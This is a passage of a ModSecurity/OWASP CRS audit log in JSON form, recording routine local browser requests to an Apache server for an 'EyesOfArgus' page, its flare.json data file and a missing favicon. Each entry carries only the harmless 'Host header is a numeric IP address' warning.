(Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:04 --0400","transaction_id":"WRc4iH8AAQEAABwOGn0AAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:46:59 GMT","ETag":"\"295-54f6a9212064f\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc4iH8AAQEAABwOGn0AAAAB\"]"],"stopwatch":{"p1":499,"p2":965,"p3":53,"p4":157,"p5":57,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:05 --0400","transaction_id":"WRc4iX8AAQEAABwOGn4AAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4iX8AAQEAABwOGn4AAAAB\"]"],"stopwatch":{"p1":385,"p2":908,"p3":53,"p4":243,"p5":61,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:05 --0400","transaction_id":"WRc4iX8AAQEAABwOGn8AAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4iX8AAQEAABwOGn8AAAAB\"]"],"stopwatch":{"p1":407,"p2":825,"p3":44,"p4":346,"p5":47,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:53 --0400","transaction_id":"WRc4uX8AAQEAABwPUrAAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc4uX8AAQEAABwPUrAAAAAC\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":697,"p2":1034,"p3":50,"p4":293,"p5":54,"sr":43,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:54 --0400","transaction_id":"WRc4un8AAQEAABwPUrEAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:47:50 GMT","ETag":"\"cca-54f6a951c3ab7-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1211","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc4un8AAQEAABwPUrEAAAAC\"]"],"stopwatch":{"p1":380,"p2":971,"p3":63,"p4":412,"p5":65,"sr":16,"sw":2,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:55 --0400","transaction_id":"WRc4u38AAQEAABwPUrIAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:47:51 GMT","ETag":"\"295-54f6a953550a5\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc4u38AAQEAABwPUrIAAAAC\"]"],"stopwatch":{"p1":671,"p2":1385,"p3":60,"p4":236,"p5":65,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:55 --0400","transaction_id":"WRc4u38AAQEAABwPUrMAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4u38AAQEAABwPUrMAAAAC\"]"],"stopwatch":{"p1":601,"p2":1386,"p3":91,"p4":415,"p5":535,"sr":24,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:55 --0400","transaction_id":"WRc4u38AAQEAABwPUrQAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4u38AAQEAABwPUrQAAAAC\"]"],"stopwatch":{"p1":469,"p2":1129,"p3":76,"p4":268,"p5":67,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:28 --0400","transaction_id":"WRc43H8AAQEAABwQSB0AAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc43H8AAQEAABwQSB0AAAAD\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":579,"p2":1152,"p3":55,"p4":344,"p5":58,"sr":41,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:29 --0400","transaction_id":"WRc43X8AAQEAABwQSB4AAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:48:25 GMT","ETag":"\"cca-54f6a973816fe-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1217","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file 